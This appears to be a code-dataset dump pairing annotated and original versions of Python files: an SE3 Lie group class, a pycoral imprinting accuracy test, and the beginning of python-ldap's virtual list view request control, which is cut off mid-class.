        Initialize the SE3 group element from a translation (x, y, z) and a rotation vector in radians
        Args:
            x: the translation distance from the origin on the X axis
            y: the translation distance from the origin on the Y axis
            z: the translation distance from the origin on the Z axis
            theta1: first element of the theta vector
            theta2: second element of the theta vector
            theta3: third element of theta vector
        """
        # Normalize the theta vector so ||theta|| is between (0, PI]
        theta = (
            theta1,
            theta2,
            theta3,
        )
        theta_norm = norm(theta)
        normalized_theta_norm = normalize_range(theta_norm, 0, math.pi)
        if theta_norm != normalized_theta_norm:
            # Rescale so the angle is the wrapped norm while keeping the
            # rotation-axis direction unchanged.
            theta = tuple(normalized_theta_norm * t / theta_norm for t in theta)
        super().__init__(x, y, z, *theta)
        # Rotation sub-element; reused by rotation/matrix/Jacobian helpers.
        self.so3 = SO3(*theta)
    @classmethod
    def identity(cls) -> LieGroupBase:
        """
        Return the identity of the group
        """
        return cls(0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
    @classmethod
    def random(cls) -> LieGroupBase:
        """
        Return a random element of the group: uniform translation in [-1, 1]^3
        combined with a random SO3 rotation
        """
        theta = SO3.random().coeff
        return cls(
            random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1), *theta,
        )
    @cached_property
    def rotation(self) -> np.ndarray:
        """
        Return the 3x3 rotation-matrix part of this element
        """
        return self.so3.matrix
    @cached_property
    def translation(self) -> np.ndarray:
        """
        Return the translation part as a length-3 vector
        """
        x = self.coeff[0]
        y = self.coeff[1]
        z = self.coeff[2]
        return np.array([x, y, z])
    @cached_property
    def matrix(self) -> np.ndarray:
        """
        Return the 4x4 homogeneous-matrix representation of the Lie group element
        See Eqs. (152)
        """
        matrix = np.identity(self.dim + 1)
        matrix[0:3, 0:3] = self.rotation
        matrix[0:3, 3] = self.translation
        return matrix
    @classmethod
    def from_matrix(cls, matrix: np.ndarray) -> LieGroupBase:
        """
        Construct the Lie group element from its 4x4 homogeneous matrix representation
        This method does not validate whether or not the matrix is well formed.
        See Eqs. (152)
        Args:
            matrix: matrix representation of the SE3 group element.
        Return:
            The equivalent SE3 group element
        """
        theta = SO3.from_matrix(matrix[0:3, 0:3]).coeff
        return cls(matrix[0][3], matrix[1][3], matrix[2][3], *theta)
    def inverse(self, J_minv_m: OptionalJacobian = None) -> LieGroupBase:
        """Returns the inverse of the this Lie Group Object instance
        See Eqs. (3) for general inverse
        See Eqs. (154) for inverse specific to the SE3 group
        See Eqs. (160) for the Jacobian of the inverse
        Args:
            J_minv_m: The Jacobian of the inverse with respect to self
        Returns:
            The inverse of self
        """
        if J_minv_m is not None:
            assert J_minv_m.shape == (self.dof, self.dof)
            J_minv_m[...] = -self.adjoint()
        # Inverse translation is -R^T t; inverse rotation negates the rotation vector.
        trans_inv = (-self.rotation.T @ self.translation).tolist()
        return self.__class__(
            trans_inv[0],
            trans_inv[1],
            trans_inv[2],
            -self.coeff[3],
            -self.coeff[4],
            -self.coeff[5],
        )
    def _compose(
        self,
        other: "SE3",
        J_mc_ma: OptionalJacobian = None,
        J_mc_mb: OptionalJacobian = None,
    ) -> LieGroupBase:
        """Returns the composition of self and another element of the same Lie group.
        See Eqs. (1,2,3,4)
        See Eqs. (155) for composition and Eqs. (161, 162) for the Jacobians
        (NOTE(review): equation numbers copied from the SE2 implementation -- confirm)
        Args:
            other: Another element of the same Lie group
            J_mc_ma: The Jacobian of the composition wrt self
            J_mc_mb: The Jacobian of the composition wrt other
        Returns:
            The composition of self and other (self @ Other)
        """
        Ra = self.rotation
        ta = self.translation
        Rb = other.rotation
        tb = other.translation
        if J_mc_ma is not None:
            x, y, z = tb.tolist()
            # Skew-symmetric (hat) matrix of other's translation.
            skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
            # NOTE(review): this single element write is immediately overwritten
            # by the 3:6, 3:6 block assignment below -- it looks redundant.
            J_mc_ma[3][3] = 1
            J_mc_ma[0:3, 0:3] = Rb.T
            J_mc_ma[3:6, 3:6] = Rb.T
            J_mc_ma[0:3, 3:6] = -Rb.T @ skew
        if J_mc_mb is not None:
            J_mc_mb[...] = np.identity(self.dof)
        m = np.identity(self.dim + 1)
        m[0:3, 0:3] = Ra @ Rb
        m[0:3, 3] = ta + Ra @ tb
        return self.__class__.from_matrix(m)
    def act(
        self,
        vec: Vector,
        J_vout_m: OptionalJacobian = None,
        J_vout_v: OptionalJacobian = None,
    ) -> Vector:
        """Perform the action of the group on a point in the vector space
        See Eqs. (165, 166, 167)
        Args:
            vec: A point in the vector space
            J_vout_m: Jacobian of the output vector wrt to self
            J_vout_v: Jacobian of the output vector wrt to vec
        Returns:
            A point acted on by the group
        """
        if J_vout_m is not None:
            x, y, z = vec.tolist()
            skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
            J_vout_m[0:3, 0:3] = self.rotation
            J_vout_m[0:3, 3:6] = -self.rotation @ skew
        if J_vout_v is not None:
            J_vout_v[...] = self.rotation
        return self.translation + self.rotation @ vec
    @staticmethod
    def q_matrix(p1, p2, p3, theta1, theta2, theta3) -> npt.NDArray:
        """Q(rho, theta) block used by the SE(3) left/right Jacobians.

        Switches to a Taylor expansion of the coefficients near ||theta|| == 0
        for numerical stability.
        """
        theta = norm((theta1, theta2, theta3))
        theta_sq = theta * theta
        if math.isclose(theta, 0, abs_tol=eps):
            # See https://ethaneade.com/lie_groups.pdf Eqs. (158, 160)
            a = 0.5
            b = 1 / 6 * (1 - theta_sq / 20 * (1 - theta_sq / 42 * (1 - theta_sq / 72)))
            c = 1 / 24 * (1 - theta_sq / 30 * (1 - theta_sq / 56 * (1 - theta_sq / 90)))
            d = (
                1
                / 120
                * (1 - theta_sq / 42 * (1 - theta_sq / 72 * (1 - theta_sq / 110)))
            )
            # Reuse d: final coefficient mirrors the closed-form branch below.
            d = 1 / 2 * (c - 3 * d)
        else:
            a = 0.5
            b = (theta - math.sin(theta)) / (theta_sq * theta)
            c = (1 - theta_sq / 2 - math.cos(theta)) / (theta_sq * theta_sq)
            d = (
                1
                / 2
                * (
                    c
                    - 3
                    * (theta - math.sin(theta) - theta_sq * theta / 6)
                    / (theta_sq * theta_sq * theta)
                )
            )
        # Skew-symmetric (hat) matrices of rho and theta.
        p_x = np.array([[0, -p3, p2], [p3, 0, -p1], [-p2, p1, 0]])
        theta_x = np.array(
            [[0, -theta3, theta2], [theta3, 0, -theta1], [-theta2, theta1, 0]]
        )
        theta_x_sq = theta_x @ theta_x
        return (
            a * p_x
            + b * (theta_x @ p_x + p_x @ theta_x + theta_x @ p_x @ theta_x)
            - c * (theta_x_sq @ p_x + p_x @ theta_x_sq - 3 * theta_x @ p_x @ theta_x)
            - d * (theta_x @ p_x @ theta_x_sq + theta_x_sq @ p_x @ theta_x)
        )
    def rjac(self) -> Jacobian:
        """Compute the right jacobian of self
        See Eqs. (41) for general computation
        See Eqs. (179a) for SE3 specific
        Remember J_r(theta) = J_l(-theta) where J_r(theta) and J_l(theta) are the left and right jacobian of the SO3 group
        """
        jacobian = np.identity(self.dof)
        jacobian[0:3, 0:3] = self.so3.rjac()
        jacobian[3:6, 3:6] = self.so3.rjac()
        # Off-diagonal Q block evaluated at the negated tangent (right Jacobian).
        jacobian[0:3, 3:6] = SE3.q_matrix(*(-self.log()).tolist())
        return jacobian
    def rjacinv(self) -> Jacobian:
        """Compute the inverse of right jacobian of self
        See Eqs. (179b)
        """
        jacobian = np.identity(self.dof)
        jacobian[0:3, 0:3] = self.so3.rjacinv()
        jacobian[3:6, 3:6] = self.so3.rjacinv()
        jacobian[0:3, 3:6] = (
            -self.so3.rjacinv()
            @ SE3.q_matrix(*(-self.log()).tolist())
            @ self.so3.rjacinv()
        )
        return jacobian
    @classmethod
    def exp(cls, tangent: Tangent, J_m_t: OptionalJacobian = None) -> LieGroupBase:
        """Compute the exponential map of the given tangent vector. The dimension of the vector should match the LieGroupBase.dof value
        See Eqs. (23)
        See Eqs. (173) for conversion between rho and t
        Args:
            J_m_t: Jacobian of the Lie group element wrt to the given tangent
        Returns:
            Exponential map of the tangent vector
        """
        p1, p2, p3, theta1, theta2, theta3 = tangent.tolist()
        so3 = SO3(theta1, theta2, theta3)
        # t = V(theta) @ rho, using J_l(theta) = J_r(theta)^T.
        x, y, z = (so3.rjac().T @ np.array([p1, p2, p3])).tolist()
        m = cls(x, y, z, theta1, theta2, theta3)
        if J_m_t is not None:
            J_m_t[...] = m.rjac()
        return m
    def log(self, J_t_m: OptionalJacobian = None) -> Tangent:
        """Compute the tangent vector of the transformation, it is equivalent to the inverse of exponential map
        See Eqs. (24)
        See Eqs. (173) for SE3 specific implementation
        Args:
            J_t_m: Jacobian of the tangent wrt to self
        Returns:
            The log() map of self in vector form
        """
        if J_t_m is not None:
            J_t_m[...] = self.rjacinv()
        # rho = V(theta)^-1 @ t, inverse of the mapping used in exp().
        p1, p2, p3 = (self.so3.rjacinv().T @ self.translation).tolist()
        return np.array([p1, p2, p3, self.coeff[3], self.coeff[4], self.coeff[5]])
    def adjoint(self) -> Adjoint:
        """Compute the adjoint of the transformation
        See Eqs. (29)
        See Eqs. (123) -- NOTE(review): reference copied from the SO2/SE2 code; confirm the SE3 equation number
        """
        adj = np.identity(self.dof)
        x, y, z = self.translation.tolist()
        # Skew-symmetric (hat) matrix of the translation.
        skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
        adj[0:3, 0:3] = self.rotation
        adj[0:3, 3:6] = skew @ self.rotation
        adj[3:6, 3:6] = self.rotation
return adj | src/liegroups/se3.py | import random
import math
from functools import cached_property
import numpy as np
import numpy.typing as npt
from liegroups.base import (
LieGroupBase,
Adjoint,
Jacobian,
OptionalJacobian,
Tangent,
Vector,
eps,
)
from liegroups.so3 import SO3
from liegroups.util import normalize_range, norm, uniform_sampling_n_ball_muller, clip
class SE3(LieGroupBase):
dof = 6
dim = 3
def __init__(
self, x: float, y: float, z: float, theta1: float, theta2: float, theta3: float
):
"""
Initialize the SE2 group element using the angle of rotation in Radians and translation in x and y
Args:
x: the translation distance from the origin on the X axis
y: the translation distance from the origin on the Y axis
z: the translation distance from the origin on the Z axis
theta1: first element of the theta vector
theta2: second element of the theta vector
theta3: third element of theta vector
"""
# Normalize the theta vector so ||theta|| is between (0, PI]
theta = (
theta1,
theta2,
theta3,
)
theta_norm = norm(theta)
normalized_theta_norm = normalize_range(theta_norm, 0, math.pi)
if theta_norm != normalized_theta_norm:
theta = tuple(normalized_theta_norm * t / theta_norm for t in theta)
super().__init__(x, y, z, *theta)
self.so3 = SO3(*theta)
@classmethod
def identity(cls) -> LieGroupBase:
"""
Return the identity of the group
"""
return cls(0.0, 0.0, 0.0, 0.0, 0.0, 0.0)
@classmethod
def random(cls) -> LieGroupBase:
"""
Return the a random element of the group
"""
theta = SO3.random().coeff
return cls(
random.uniform(-1, 1), random.uniform(-1, 1), random.uniform(-1, 1), *theta,
)
@cached_property
def rotation(self) -> np.ndarray:
"""
Return the matrix representation of the rotation
"""
return self.so3.matrix
@cached_property
def translation(self) -> np.ndarray:
"""
Return the matrix representation of the translation
"""
x = self.coeff[0]
y = self.coeff[1]
z = self.coeff[2]
return np.array([x, y, z])
@cached_property
def matrix(self) -> np.ndarray:
"""
Return the matrix representation of the Lie group element
See Eqs. (152)
"""
matrix = np.identity(self.dim + 1)
matrix[0:3, 0:3] = self.rotation
matrix[0:3, 3] = self.translation
return matrix
@classmethod
def from_matrix(cls, matrix: np.ndarray) -> LieGroupBase:
"""
Construct the Lie group element from its matrix representation
This method does not validate whether or not the matrix is well formed.
See Eqs. (152)
Args:
matrix: matrix representation of the SO2 group element.
Return:
The equivalent SO2 group
"""
theta = SO3.from_matrix(matrix[0:3, 0:3]).coeff
return cls(matrix[0][3], matrix[1][3], matrix[2][3], *theta)
def inverse(self, J_minv_m: OptionalJacobian = None) -> LieGroupBase:
"""Returns the inverse of the this Lie Group Object instance
See Eqs. (3) for general inverse
See Eqs. (154) for inverse specific to the SE2 group
See Eqs. (160) for the Jacobian of the inverse
Args:
J_minv_m: The Jacobian of the inverse with respect to self
Returns:
The inverese of self
"""
if J_minv_m is not None:
assert J_minv_m.shape == (self.dof, self.dof)
J_minv_m[...] = -self.adjoint()
trans_inv = (-self.rotation.T @ self.translation).tolist()
return self.__class__(
trans_inv[0],
trans_inv[1],
trans_inv[2],
-self.coeff[3],
-self.coeff[4],
-self.coeff[5],
)
def _compose(
self,
other: "SE3",
J_mc_ma: OptionalJacobian = None,
J_mc_mb: OptionalJacobian = None,
) -> LieGroupBase:
"""Returns the composition of self and another element of the same Lie group.
See Eqs. (1,2,3,4)
See Eqs. (155) for implementation specific to SE2
See Eqs. (161, 162) for Jacobian implementation
Args:
other: Another element of the same Lie group
J_mc_ma: The Jacobian of the composition wrt self
J_mc_mb: The Jacobian of the composition wrt other
Returns:
The composition of self and other (self @ Other)
"""
Ra = self.rotation
ta = self.translation
Rb = other.rotation
tb = other.translation
if J_mc_ma is not None:
x, y, z = tb.tolist()
skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
J_mc_ma[3][3] = 1
J_mc_ma[0:3, 0:3] = Rb.T
J_mc_ma[3:6, 3:6] = Rb.T
J_mc_ma[0:3, 3:6] = -Rb.T @ skew
if J_mc_mb is not None:
J_mc_mb[...] = np.identity(self.dof)
m = np.identity(self.dim + 1)
m[0:3, 0:3] = Ra @ Rb
m[0:3, 3] = ta + Ra @ tb
return self.__class__.from_matrix(m)
def act(
self,
vec: Vector,
J_vout_m: OptionalJacobian = None,
J_vout_v: OptionalJacobian = None,
) -> Vector:
"""Perform the action of the group on a point in the vector space
See Eqs. (165, 166, 167)
Args:
vec: A point in the vector space
J_vout_m: Jacobian of the output vector wrt to self
J_vout_v: Jacobian of the output vector wrt to vec
Returns:
A point acted on by the group
"""
if J_vout_m is not None:
x, y, z = vec.tolist()
skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
J_vout_m[0:3, 0:3] = self.rotation
J_vout_m[0:3, 3:6] = -self.rotation @ skew
if J_vout_v is not None:
J_vout_v[...] = self.rotation
return self.translation + self.rotation @ vec
@staticmethod
def q_matrix(p1, p2, p3, theta1, theta2, theta3) -> npt.NDArray:
theta = norm((theta1, theta2, theta3))
theta_sq = theta * theta
if math.isclose(theta, 0, abs_tol=eps):
# See https://ethaneade.com/lie_groups.pdf Eqs. (158, 160)
a = 0.5
b = 1 / 6 * (1 - theta_sq / 20 * (1 - theta_sq / 42 * (1 - theta_sq / 72)))
c = 1 / 24 * (1 - theta_sq / 30 * (1 - theta_sq / 56 * (1 - theta_sq / 90)))
d = (
1
/ 120
* (1 - theta_sq / 42 * (1 - theta_sq / 72 * (1 - theta_sq / 110)))
)
d = 1 / 2 * (c - 3 * d)
else:
a = 0.5
b = (theta - math.sin(theta)) / (theta_sq * theta)
c = (1 - theta_sq / 2 - math.cos(theta)) / (theta_sq * theta_sq)
d = (
1
/ 2
* (
c
- 3
* (theta - math.sin(theta) - theta_sq * theta / 6)
/ (theta_sq * theta_sq * theta)
)
)
p_x = np.array([[0, -p3, p2], [p3, 0, -p1], [-p2, p1, 0]])
theta_x = np.array(
[[0, -theta3, theta2], [theta3, 0, -theta1], [-theta2, theta1, 0]]
)
theta_x_sq = theta_x @ theta_x
return (
a * p_x
+ b * (theta_x @ p_x + p_x @ theta_x + theta_x @ p_x @ theta_x)
- c * (theta_x_sq @ p_x + p_x @ theta_x_sq - 3 * theta_x @ p_x @ theta_x)
- d * (theta_x @ p_x @ theta_x_sq + theta_x_sq @ p_x @ theta_x)
)
def rjac(self) -> Jacobian:
"""Compute the right jacobian of self
See Eqs. (41) for general computation
See Eqs. (179a) for SE3 specific
Remember J_r(theta) = J_l(-theta) where J_r(theta) and J_l(theta) are the left and right jacobian of the SO3 group
"""
jacobian = np.identity(self.dof)
jacobian[0:3, 0:3] = self.so3.rjac()
jacobian[3:6, 3:6] = self.so3.rjac()
jacobian[0:3, 3:6] = SE3.q_matrix(*(-self.log()).tolist())
return jacobian
def rjacinv(self) -> Jacobian:
"""Compute the inverse of right jacobian of self
See Eqs. (179b)
"""
jacobian = np.identity(self.dof)
jacobian[0:3, 0:3] = self.so3.rjacinv()
jacobian[3:6, 3:6] = self.so3.rjacinv()
jacobian[0:3, 3:6] = (
-self.so3.rjacinv()
@ SE3.q_matrix(*(-self.log()).tolist())
@ self.so3.rjacinv()
)
return jacobian
@classmethod
def exp(cls, tangent: Tangent, J_m_t: OptionalJacobian = None) -> LieGroupBase:
"""Compute the exponential map of the given tagent vector. The dimension of the vector should match the LieGroupBase.dof value
See Eqs. (23)
See Eqs. (173) for conversion between rho and t
Args:
J_m_t: Jacobian of the Lie group element wrt to the given tangent
Returns:
Exponential map of the tagent vector
"""
p1, p2, p3, theta1, theta2, theta3 = tangent.tolist()
so3 = SO3(theta1, theta2, theta3)
x, y, z = (so3.rjac().T @ np.array([p1, p2, p3])).tolist()
m = cls(x, y, z, theta1, theta2, theta3)
if J_m_t is not None:
J_m_t[...] = m.rjac()
return m
def log(self, J_t_m: OptionalJacobian = None) -> Tangent:
"""Compute the tagent vector of the transformation, it is equivalent to the inverse of exponential map
See Eqs. (24)
See Eqs. (173) for SE3 specific implementation
Args:
J_t_m: Jacobian of the tagent wrt to self
Returns:
The log() map of self in vector form
"""
if J_t_m is not None:
J_t_m[...] = self.rjacinv()
p1, p2, p3 = (self.so3.rjacinv().T @ self.translation).tolist()
return np.array([p1, p2, p3, self.coeff[3], self.coeff[4], self.coeff[5]])
def adjoint(self) -> Adjoint:
"""Compute the adjoint of the transformation
See Eqs. (29)
See Eqs. (123) for SO2 specifics
"""
adj = np.identity(self.dof)
x, y, z = self.translation.tolist()
skew = np.array([[0, -z, y], [z, 0, -x], [-y, x, 0]])
adj[0:3, 0:3] = self.rotation
adj[0:3, 3:6] = skew @ self.rotation
adj[3:6, 3:6] = self.rotation
return adj | 0.874814 | 0.682577 |
"""Evaluates the accuracy of imprinting based transfer learning model."""
import contextlib
import os
from PIL import Image
from pycoral.adapters import classify
from pycoral.adapters import common
from pycoral.learn.imprinting.engine import ImprintingEngine
from pycoral.utils.edgetpu import make_interpreter
from tests import test_utils
import unittest
@contextlib.contextmanager
def test_image(path):
  """Context manager yielding a PIL image read from *path*.

  Both the underlying file object and the decoded image are closed on exit.
  """
  with open(path, 'rb') as stream, Image.open(stream) as img:
    yield img
class ImprintingEngineEvaluationTest(unittest.TestCase):
  """End-to-end accuracy regression test for imprinting transfer learning."""
  def _transfer_learn_and_evaluate(self, model_path, keep_classes, dataset_path,
                                   test_ratio, top_k_range):
    """Transfer-learns with given params and returns the evaluation result.
    Args:
      model_path: string, path of the base model.
      keep_classes: bool, whether to keep base model classes.
      dataset_path: string, path to the directory of dataset. The images should
        be put under sub-directory named by category.
      test_ratio: float, the ratio of images used for test.
      top_k_range: int, top_k range to be evaluated. The function will return
        accuracy from top 1 to top k.
    Returns:
      list of float numbers.
    """
    engine = ImprintingEngine(model_path, keep_classes)
    # Interpreter for the embedding-extractor part of the base model.
    extractor = make_interpreter(engine.serialize_extractor_model())
    extractor.allocate_tensors()
    num_classes = engine.num_classes
    print('--------------- Parsing dataset ----------------')
    print('Dataset path:', dataset_path)
    # train in fixed order to ensure the same evaluation result.
    train_set, test_set = test_utils.prepare_data_set_from_directory(
        dataset_path, test_ratio, True)
    print('Image list successfully parsed! Number of Categories = ',
          len(train_set))
    print('--------------- Processing training data ----------------')
    print('This process may take more than 30 seconds.')
    train_input = []
    labels_map = {}
    # New classes are appended after the base model's classes, so their ids
    # start at num_classes.
    for class_id, (category, image_list) in enumerate(train_set.items()):
      print('Processing {} ({} images)'.format(category, len(image_list)))
      train_input.append(
          [os.path.join(dataset_path, category, image) for image in image_list])
      labels_map[num_classes + class_id] = category
    # train
    print('---------------- Start training -----------------')
    size = common.input_size(extractor)
    for class_id, images in enumerate(train_input):
      for image in images:
        with test_image(image) as img:
          common.set_input(extractor, img.resize(size, Image.NEAREST))
          extractor.invoke()
          # Imprint the embedding vector of this image under its class id.
          engine.train(classify.get_scores(extractor),
                       class_id=num_classes + class_id)
    print('---------------- Training finished -----------------')
    with test_utils.temporary_file(suffix='.tflite') as output_model_path:
      output_model_path.write(engine.serialize_model())
      # Evaluate
      print('---------------- Start evaluating -----------------')
      classifier = make_interpreter(output_model_path.name)
      classifier.allocate_tensors()
      # top[i] represents number of top (i+1) correct inference.
      top_k_correct_count = [0] * top_k_range
      image_num = 0
      for category, image_list in test_set.items():
        n = len(image_list)
        print('Evaluating {} ({} images)'.format(category, n))
        for image_name in image_list:
          with test_image(os.path.join(dataset_path, category,
                                       image_name)) as img:
            # NOTE(review): the original comment mentioned passing a negative
            # score threshold, but no threshold is passed here; get_classes
            # defaults apply -- confirm top_k alone is sufficient.
            size = common.input_size(classifier)
            common.set_input(classifier, img.resize(size, Image.NEAREST))
            classifier.invoke()
            candidates = classify.get_classes(classifier, top_k=top_k_range)
            # Count a hit at the rank i where the true category appears.
            for i in range(len(candidates)):
              candidate = candidates[i]
              if candidate.id in labels_map and \
                  labels_map[candidate.id] == category:
                top_k_correct_count[i] += 1
                break
        image_num += n
      # Accumulate per-rank hits into cumulative top-(i+1) hit counts.
      for i in range(1, top_k_range):
        top_k_correct_count[i] += top_k_correct_count[i - 1]
      return [top_k_correct_count[i] / image_num for i in range(top_k_range)]
  def _test_oxford17_flowers_single(self, model_path, keep_classes, expected):
    """Trains on oxford_17flowers and checks top-1..top-k accuracy floors."""
    top_k_range = len(expected)
    ret = self._transfer_learn_and_evaluate(
        test_utils.test_data_path(model_path), keep_classes,
        test_utils.test_data_path('oxford_17flowers'), 0.25, top_k_range)
    for i in range(top_k_range):
      self.assertGreaterEqual(ret[i], expected[i])
  # Evaluate with L2Norm full model, not keeping base model classes.
  def test_oxford17_flowers_l2_norm_model_not_keep_classes(self):
    self._test_oxford17_flowers_single(
        'mobilenet_v1_1.0_224_l2norm_quant.tflite',
        keep_classes=False,
        expected=[0.86, 0.94, 0.96, 0.97, 0.97])
  # Evaluate with L2Norm full model, keeping base model classes.
  def test_oxford17_flowers_l2_norm_model_keep_classes(self):
    self._test_oxford17_flowers_single(
        'mobilenet_v1_1.0_224_l2norm_quant.tflite',
        keep_classes=True,
        expected=[0.86, 0.94, 0.96, 0.96, 0.97])
if __name__ == '__main__':
test_utils.coral_test_main() | tests/imprinting_evaluation_test.py | """Evaluates the accuracy of imprinting based transfer learning model."""
import contextlib
import os
from PIL import Image
from pycoral.adapters import classify
from pycoral.adapters import common
from pycoral.learn.imprinting.engine import ImprintingEngine
from pycoral.utils.edgetpu import make_interpreter
from tests import test_utils
import unittest
@contextlib.contextmanager
def test_image(path):
  """Context manager yielding a PIL image read from *path*.

  Both the underlying file object and the decoded image are closed on exit.
  """
  with open(path, 'rb') as stream, Image.open(stream) as img:
    yield img
class ImprintingEngineEvaluationTest(unittest.TestCase):
  """End-to-end accuracy regression test for imprinting transfer learning."""
  def _transfer_learn_and_evaluate(self, model_path, keep_classes, dataset_path,
                                   test_ratio, top_k_range):
    """Transfer-learns with given params and returns the evaluation result.
    Args:
      model_path: string, path of the base model.
      keep_classes: bool, whether to keep base model classes.
      dataset_path: string, path to the directory of dataset. The images should
        be put under sub-directory named by category.
      test_ratio: float, the ratio of images used for test.
      top_k_range: int, top_k range to be evaluated. The function will return
        accuracy from top 1 to top k.
    Returns:
      list of float numbers.
    """
    engine = ImprintingEngine(model_path, keep_classes)
    # Interpreter for the embedding-extractor part of the base model.
    extractor = make_interpreter(engine.serialize_extractor_model())
    extractor.allocate_tensors()
    num_classes = engine.num_classes
    print('--------------- Parsing dataset ----------------')
    print('Dataset path:', dataset_path)
    # train in fixed order to ensure the same evaluation result.
    train_set, test_set = test_utils.prepare_data_set_from_directory(
        dataset_path, test_ratio, True)
    print('Image list successfully parsed! Number of Categories = ',
          len(train_set))
    print('--------------- Processing training data ----------------')
    print('This process may take more than 30 seconds.')
    train_input = []
    labels_map = {}
    # New classes are appended after the base model's classes, so their ids
    # start at num_classes.
    for class_id, (category, image_list) in enumerate(train_set.items()):
      print('Processing {} ({} images)'.format(category, len(image_list)))
      train_input.append(
          [os.path.join(dataset_path, category, image) for image in image_list])
      labels_map[num_classes + class_id] = category
    # train
    print('---------------- Start training -----------------')
    size = common.input_size(extractor)
    for class_id, images in enumerate(train_input):
      for image in images:
        with test_image(image) as img:
          common.set_input(extractor, img.resize(size, Image.NEAREST))
          extractor.invoke()
          # Imprint the embedding vector of this image under its class id.
          engine.train(classify.get_scores(extractor),
                       class_id=num_classes + class_id)
    print('---------------- Training finished -----------------')
    with test_utils.temporary_file(suffix='.tflite') as output_model_path:
      output_model_path.write(engine.serialize_model())
      # Evaluate
      print('---------------- Start evaluating -----------------')
      classifier = make_interpreter(output_model_path.name)
      classifier.allocate_tensors()
      # top[i] represents number of top (i+1) correct inference.
      top_k_correct_count = [0] * top_k_range
      image_num = 0
      for category, image_list in test_set.items():
        n = len(image_list)
        print('Evaluating {} ({} images)'.format(category, n))
        for image_name in image_list:
          with test_image(os.path.join(dataset_path, category,
                                       image_name)) as img:
            # NOTE(review): the original comment mentioned passing a negative
            # score threshold, but no threshold is passed here; get_classes
            # defaults apply -- confirm top_k alone is sufficient.
            size = common.input_size(classifier)
            common.set_input(classifier, img.resize(size, Image.NEAREST))
            classifier.invoke()
            candidates = classify.get_classes(classifier, top_k=top_k_range)
            # Count a hit at the rank i where the true category appears.
            for i in range(len(candidates)):
              candidate = candidates[i]
              if candidate.id in labels_map and \
                  labels_map[candidate.id] == category:
                top_k_correct_count[i] += 1
                break
        image_num += n
      # Accumulate per-rank hits into cumulative top-(i+1) hit counts.
      for i in range(1, top_k_range):
        top_k_correct_count[i] += top_k_correct_count[i - 1]
      return [top_k_correct_count[i] / image_num for i in range(top_k_range)]
  def _test_oxford17_flowers_single(self, model_path, keep_classes, expected):
    """Trains on oxford_17flowers and checks top-1..top-k accuracy floors."""
    top_k_range = len(expected)
    ret = self._transfer_learn_and_evaluate(
        test_utils.test_data_path(model_path), keep_classes,
        test_utils.test_data_path('oxford_17flowers'), 0.25, top_k_range)
    for i in range(top_k_range):
      self.assertGreaterEqual(ret[i], expected[i])
  # Evaluate with L2Norm full model, not keeping base model classes.
  def test_oxford17_flowers_l2_norm_model_not_keep_classes(self):
    self._test_oxford17_flowers_single(
        'mobilenet_v1_1.0_224_l2norm_quant.tflite',
        keep_classes=False,
        expected=[0.86, 0.94, 0.96, 0.97, 0.97])
  # Evaluate with L2Norm full model, keeping base model classes.
  def test_oxford17_flowers_l2_norm_model_keep_classes(self):
    self._test_oxford17_flowers_single(
        'mobilenet_v1_1.0_224_l2norm_quant.tflite',
        keep_classes=True,
        expected=[0.86, 0.94, 0.96, 0.96, 0.97])
if __name__ == '__main__':
test_utils.coral_test_main() | 0.874158 | 0.559651 |
__all__ = [
'VLVRequestControl',
'VLVResponseControl',
]
import ldap
from ldap.ldapobject import LDAPObject
from ldap.controls import (RequestControl, ResponseControl,
KNOWN_RESPONSE_CONTROLS, DecodeControlTuples)
from pyasn1.type import univ, namedtype, tag, namedval, constraint
from pyasn1.codec.ber import encoder, decoder
class ByOffsetType(univ.Sequence):
    # ASN.1 (draft-ietf-ldapext-ldapv3-vlv-09):
    #   byOffset [0] SEQUENCE { offset INTEGER, contentCount INTEGER }
    # The implicit context tag 0 distinguishes this arm inside TargetType.
    tagSet = univ.Sequence.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('offset', univ.Integer()),
        namedtype.NamedType('contentCount', univ.Integer()))
class TargetType(univ.Choice):
    # ASN.1 CHOICE locating the target entry of the list view:
    #   byOffset           [0] -- absolute position (see ByOffsetType)
    #   greaterThanOrEqual [1] AssertionValue -- first entry >= this value
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('byOffset', ByOffsetType()),
        namedtype.NamedType('greaterThanOrEqual', univ.OctetString().subtype(
            implicitTag=tag.Tag(tag.tagClassContext,
                                tag.tagFormatSimple, 1))))
class VirtualListViewRequestType(univ.Sequence):
    # ASN.1 VirtualListViewRequest ::= SEQUENCE {
    #   beforeCount INTEGER, afterCount INTEGER,
    #   target CHOICE, contextID OCTET STRING OPTIONAL }
    componentType = namedtype.NamedTypes(
        namedtype.NamedType('beforeCount', univ.Integer()),
        namedtype.NamedType('afterCount', univ.Integer()),
        namedtype.NamedType('target', TargetType()),
        namedtype.OptionalNamedType('contextID', univ.OctetString()))
class VLVRequestControl(RequestControl):
    """LDAP Virtual List View request control (2.16.840.1.113730.3.4.9).

    See draft-ietf-ldapext-ldapv3-vlv-09. The target entry is addressed
    either by absolute position (`offset` together with `content_count`)
    or by an assertion value (`greater_than_or_equal`); exactly one of the
    two forms must be supplied.
    """
    controlType = '2.16.840.1.113730.3.4.9'
    def __init__(
        self,
        criticality=False,
        before_count=0,
        after_count=0,
        offset=None,
        content_count=None,
        greater_than_or_equal=None,
        context_id=None,
    ):
        """
        :param before_count: number of entries requested before the target
        :param after_count: number of entries requested after the target
        :param offset: offset of the target entry (used with content_count)
        :param content_count: client's estimate of the list size (used with offset)
        :param greater_than_or_equal: assertion value locating the target entry
        :param context_id: opaque context returned by a previous VLV response
        :raises ValueError: when neither addressing form is fully specified
        """
        RequestControl.__init__(self,self.controlType,criticality)
        # Bug fix: this used `assert cond, ValueError(...)`, which raises
        # AssertionError (never the ValueError built as its message) and is
        # stripped entirely under `python -O`; validate explicitly instead.
        if not ((offset is not None and content_count is not None) or
                greater_than_or_equal):
            raise ValueError(
                'offset and content_count must be set together or greater_than_or_equal must be used'
            )
        self.before_count = before_count
        self.after_count = after_count
        self.offset = offset
        self.content_count = content_count
